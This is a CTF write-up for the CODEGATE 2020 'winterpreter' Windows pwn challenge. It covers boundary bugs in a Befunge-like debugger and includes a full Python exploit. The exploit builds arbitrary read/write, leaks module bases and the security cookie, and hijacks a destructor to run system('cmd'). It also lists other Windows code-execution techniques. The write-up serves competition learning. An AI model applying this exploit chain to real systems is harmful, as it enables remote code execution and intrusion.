Tags: windows esoteric-language 

Rating: 5.0

# winterpreter writeup

## Description

This is a Windows userland exploitation challenge written in VC++. The given binary is an overly simplified debugger for a Befunge-like language (modified subset of [Funge-98](https://github.com/catseye/Funge-98/blob/master/doc/funge98.markdown)). Attacker must escape the debugger and gain arbitrary code execution to read the flag file.

## Solution

There are largely three bugs, which can all be traced to improper boundary checking mechanism.

1. Single byte overread using `'` instruction at any boundary of code.
```
15 1
> '
> run
Program started.
> step 15
14 step(s) executed.
Program terminated: PC out of range
> stack
Stack Dump:
00
> pc
PC: (16, 0)
```

1. Single byte overwrite using `s` instruction at any boundary of code.
```
15 1
>1&&&p X
> run
Program started.
> step 15
115
14
0
14 step(s) executed.
Program terminated: PC out of range
> pc
PC: (16, 0)
> run
Program started.
> step 15
39
14
0
14 step(s) executed.
Program terminated: PC out of range
> pc
PC: (16, 0)
> stack
Stack Dump:
01
01
```

1. Out of bound execution using `#` instruction in conjunction with cycle execution mode.
```
15 1
> #
> run
Program started.
> step 14
14 step(s) executed.
> pc
PC: (14, 0)
> cycle 1
0 cycle(s) executed.
Program terminated: Illegal instruction
> pc
PC: (16, 0)
```

One can write a short code that receives input from user, and writes it out to code. It is equally possible to read an arbitrary character in code area. Putting it all together, one can write a code that diverts the program control flow to write and read at arbitrary code position, and also execute some predefined part of code possibly written by user input. This allows the attacker to freely use any instructions from a fixed base code.

Base code for put & get & code execution:
```python
code = [
'v >&&&p@', # 1, 1 (put)
'# ',
'>&|',
'& ',
'# >&' + r':&\&\p'*8 + '@', # 1, 0 (put_qword)
' ',
'| >&&g.@', # 0, 1, 1 (get)
'# ',
'>&|',
'& ',
'# >&' + r':&\g.'*8 + '@', # 0, 1, 0 (get_qword)
' ',
'|',
'',
'',
'',
'',
'',
'',
'',
'',
'',
'',
'>', # 0, 0 (run)
'', # last line for completely arbitrary RW (mem_*)
]
```

Since the debugger does not reset code at each runs, one can chain the above bugs to gain a limited relative write primitive as below:
1. Write
```
'& s'
```
to code and run it with input `ord('s')` -> `'s'` written after string buffer
1. Write
```
'& # '
```
to code and run it with input `255` -> `'s\xff'` written after string buffer, where the `'\xff'` overflows into string length

Note that the above exploit is able to overflow string length only for code lines of length 0xf or smaller. This is because longer strings are allocated into Windows heap. This exploit assumes that all code lines directly related to exploitation are of length 0xf or smaller.

With the above primitive, one can only directly read and write at x-coordinates only in range \[0, 80\). This is because the OOB checker checks the coordinates against origin and maximum code size. For string objects close to the lower boundary (maximum y-coord), this is sufficient to leak executable image base.

However, one can make use of the limited relative write primitive to gain completely arbitrary read/write primitive. After overflowing the string length, the attacker can completely overwrite the next string object. Thus, the attacker can fake the string object as if it is allocated at a completely controlled pointer.

Using the arbitrary read/write primitive, one can trivially leak DLL bases from import section, `__security_cookie` from data section, and generally everything whose address is known to the attacker.

From this point, it is up to the attacker to use any preferred methods to gain arbitrary code execution. The sample exploit code utilizes a destructor function and the locking mechanism for magic statics. Specifically, the exploit code does the following:
1. Overwrite `std::_Fac_head` pointer such that destructor calls `_Init_thread_notify`
2. Overwrite appropriate command (`"cmd"`) to `_Tss_cv`
3. Overwrite `_Tss_event` to 0
4. Overwrite `encoded_wake_all_condition_variable` to `_decode_pointer(ucrtbase!system)`
5. Trigger exploit by graceful exit (command `quit`)

The exploit is triggered in the following steps:
1. Destructor is called at exit, which calls `_Init_thread_notify()` as overwritten
1. `_Init_thread_notify()` calls `(_encode_pointer(encoded_wake_all_condition_variable))(&_Tss_cv)` if `!_Tss_event`, equivalent to `system("cmd")` in our exploit

After gaining command prompt, `type C:\CTF\flag.txt` to read flag file.

**FLAG: `CODEGATE2020{pwn1ng_da7_d3bugger_w17h_an0th3r_d1m3nsi0n}`**

Exploit Code:
```python
### This exploit is based on a Windows environment with python2 + customized pwintools(https://github.com/leesh3288/pwintools)
### Else, one can carve through all the DLLs and hardcode their offsets
from pwintools import *

binary = PE(r'..\dist\winterpreter.exe')
k32 = PE(r'..\dist\libs\kernel32.dll')
ntdll = PE(r'..\dist\libs\ntdll.dll')
ucrt = PE(r'..\dist\libs\ucrtbase.dll')
msvcp = PE(r'..\dist\libs\msvcp140.dll')
vcrt = PE(r'..\dist\libs\vcruntime140.dll')
p = Remote('183.107.102.15', 54321)
p.timeout = 5000

PAYLOAD_LEN = 14
MAXH = 25
MAXW = 80
LIMW = 15

def cmd(s):
p.recvuntil('> ')
p.sendline(s)

def put(x, y, v):
cmd('stop')
cmd('run')
cmd('cycle 1000')
p.sendline('1')
p.sendline('1')
p.sendline(str(v))
p.sendline(str(x))
p.sendline(str(y))

def put_qword(x, y, v):
cmd('stop')
cmd('run')
cmd('cycle 1000')
p.sendline('1')
p.sendline('0')
p.sendline(str(y))
for i, c in enumerate(p64(v)):
p.sendline(str(ord(c)))
p.sendline(str(x + i))

def get(x, y):
cmd('stop')
cmd('run')
cmd('cycle 1000')
p.sendline('0')
p.sendline('1')
p.sendline('1')
p.sendline(str(x))
p.sendline(str(y))
return chr(int(p.recvuntil(' ', drop = True)))

def get_qword(x, y):
cmd('stop')
cmd('run')
cmd('cycle 1000')
p.sendline('0')
p.sendline('1')
p.sendline('0')
p.sendline(str(y))
for i in range(8):
p.sendline(str(x + i))
return u64(''.join(chr(int(p.recvuntil(' ', drop = True))) for _ in range(8)))

def run(payload, aux = ''):
assert(len(payload) <= PAYLOAD_LEN)
for i, c in enumerate(payload.ljust(PAYLOAD_LEN, ' ')):
put(i + 1, MAXH - 2, ord(c))
cmd('stop')
cmd('run')
cmd('cycle 1000')
p.sendline('0')
p.sendline('0')
for c in aux:
p.sendline(str(ord(c)))

# overwrite std::string[MAXH - 1] structure
def mem_init(addr, length = MAXW, capacity = 0x10):
put_qword(0x20, MAXH - 2, addr)
put_qword(0x30, MAXH - 2, length)
put_qword(0x38, MAXH - 2, capacity)

def mem_read_qword(ofs):
assert(ofs in range(0, MAXW - 8))
return get_qword(ofs, MAXH - 1)

def mem_write_qword(ofs, v):
assert(ofs in range(0, MAXW - 8))
return put_qword(ofs, MAXH - 1, v)

def ROR8(data, rot):
return ((data >> rot) | (data << (0x40 - rot))) & ((1 << 0x40) - 1)

def _decode_pointer(ptr, cookie):
return ROR8(ptr, 0x40 - (cookie & 0x3f)) ^ cookie

# arbitrary put&get + code runner
code = [
'v >&&&p@', # 1, 1 (put)
'# ',
'>&|',
'& ',
'# >&' + r':&\&\p'*8 + '@', # 1, 0 (put_qword)
' ',
'| >&&g.@', # 0, 1, 1 (get)
'# ',
'>&|',
'& ',
'# >&' + r':&\g.'*8 + '@', # 0, 1, 0 (get_qword)
' ',
'|',
'',
'',
'',
'',
'',
'',
'',
'',
'',
'',
'>', # 0, 0 (run)
'', # last line for completely arbitrary RW (mem_*)
]
assert(max(len(line) for line in code) <= MAXW)
assert(len(code) == MAXH)

p.sendline('{} {}'.format(MAXW, MAXH))
for codeline in code:
p.sendline(codeline.ljust(LIMW, ' '))

run('& s', 's') # overflow: "s"
run('& # ', chr(0xff)) # overflow: "s\xff" => code.inst[MAXH - 2].length = 0xff

# leak executable image base from LEFT.x
img_base = get_qword(0x48, MAXH - 2) - 0xE4F8
log.info('winterpreter.exe base: 0x{:016x}'.format(img_base))
assert(img_base & 0xffff == 0)

# leak DLL base from imports
# we only need ucrtbase.dll leak, the others are for illustration
mem_init(img_base + binary.sections['.rdata'][0] + 0xD0)
k32_base = mem_read_qword(0) - k32.symbols['InitializeCriticalSectionAndSpinCount']
ntdll_base = mem_read_qword(0x8) - ntdll.symbols['RtlLeaveCriticalSection']
msvcp_base = mem_read_qword(0x28) - msvcp.symbols['?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ']

mem_init(img_base + binary.sections['.rdata'][0] + 0x298)
vcrt_base = mem_read_qword(0) - vcrt.symbols['_CxxThrowException']
ucrt_base = mem_read_qword(0x10) - ucrt.symbols['malloc']

log.info('kernel32.dll base: 0x{:016x}'.format(k32_base))
log.info('ntdll.dll base: 0x{:016x}'.format(ntdll_base))
log.info('ucrtbase.dll base: 0x{:016x}'.format(ucrt_base))
log.info('msvcp140.dll base: 0x{:016x}'.format(msvcp_base))
log.info('vcruntime140.dll base: 0x{:016x}'.format(vcrt_base))
assert(reduce(lambda x, y: x | y, [k32_base, ntdll_base, ucrt_base, msvcp_base, vcrt_base]) & 0xffff == 0)

# leak __security_cookie (ofs 0xE020)
cookie_addr = img_base + 0xE020
mem_init(cookie_addr)
cookie = mem_read_qword(0)
log.info('__security_cookie: 0x{:016x}'.format(cookie))

# overwrite std::_Fac_head (ofs 0xF930) such that destructor calls _Init_thread_notify (ofs 0x87D8)
scratch = img_base + 0xF000 # originally space for mt19937_64 object
destructor_ptr = img_base + 0xF930
mem_init(scratch)
mem_write_qword(0, scratch)
mem_write_qword(8, scratch + 8)
mem_write_qword(0x18, img_base + 0x87D8)
mem_init(destructor_ptr)
mem_write_qword(0, scratch)

# write appropriate command @ _Tss_cv (ofs 0xF9B0)
write_base = img_base + 0xF9B0
mem_init(write_base)
mem_write_qword(0, u64("cmd\0\0\0\0\0"))

# overwrite _Tss_event to zero (ofs 0xF9B8)
mem_write_qword(8, 0)

# overwrite encoded_wake_all_condition_variable (ofs 0xF9C8)
mem_write_qword(0x18, _decode_pointer(ucrt_base + ucrt.symbols['system'], cookie))

# reset to normal, prevent crashing at std::string destructor
mem_init(img_base + binary.sections['.rdata'][0] + 0xF0, 0xf, 0xf)

# trigger exploit
cmd('quit')

p.interactive()
```

Note that there are various methods of obtaining RCE from arbitrary RW in Windows. Notably, the following techniques exist:
1. Use destructor codes in given executable binary. The above exploit code utilizes this method to minimize Windows version dependent offsets.
2. Overwrite atexit functions at `ucrtbase!_acrt_atexit_table`. Oneshot gadget inside `ucrtbase!common_system_char_` would be an easy target, as we can satisfy the constraint `[rbp - 0x20] == NULL` and also satisfy stack alignment.
3. Convert the arbitrary RW into ROP as follows:
1. Leak ntdll base
2. Leak PEB from ntdll .data section
3. Calculate TEB address from PEB (TEB = PEB + 0x1000)
4. Egg hunt a known value at stack, starting from TEB.StackBase down to TEB.StackLimit. Now we have exact stack address leak.

## Appendix

Code space: Max 25 lines, 80 chars per line. Code space may be jagged, meaning that each lines may have different character limits.

Below are the instructions defined in the language used in this challenge.

```
0-9, a-f Push this number on the stack
+ Addition: Pop a and b, then push a+b
- Subtraction: Pop a and b, then push b-a
* Multiplication: Pop a and b, then push a*b
/ Integer division: Pop a and b, then push b/a, rounded towards 0.
% Modulo: Pop a and b, then push the remainder of the integer division of b/a.
! Logical NOT: Pop a value. If the value is zero, push 1; otherwise, push zero.
` Greater than: Pop a and b, then push 1 if b>a, otherwise zero.
> Start moving right
< Start moving left
^ Start moving up
v Start moving down
? Start moving in a random cardinal direction
_ Pop a value; move right if value=0, left otherwise
| Pop a value; move down if value=0, up otherwise
" Start string mode: push each character's ASCII value all the way up to the next "
: Duplicate value on top of the stack
\ Swap two values on top of the stack
$ Pop value from the stack and discard it
. Pop value and output as an integer followed by a space
, Pop value and output as ASCII character
# Bridge: Skip next cell
p A "put" call (a way to store a value for later use). Pop y, x, and v, then change the character at (x,y) in the program to the character with ASCII value v
g A "get" call (a way to retrieve data in storage). Pop y and x, then push ASCII value of the character at that position in the program
& Ask user for a number and push it
' Fetch ASCII value of the character at next position in the program, then push the value. Skip next position (like #)
s Pop c, then write ASCII value of character c at next position in the program. Skip next position (like #)
x Pop c, then overwrite current position character as ASCII value of character c. Do not execute newly written character.
@ End program
(space) No-op. Does nothing
```
Reference: [Befunge-93 instruction list @ Wikipedia](https://en.wikipedia.org/wiki/Befunge#Befunge-93_instruction_list), [Funge-98 Specification](https://github.com/catseye/Funge-98/blob/master/doc/funge98.markdown)

Original writeup (https://github.com/leesh3288/CTF/tree/master/2020/CODEGATE_2020_Preliminary/winterpreter/exploit_writeup).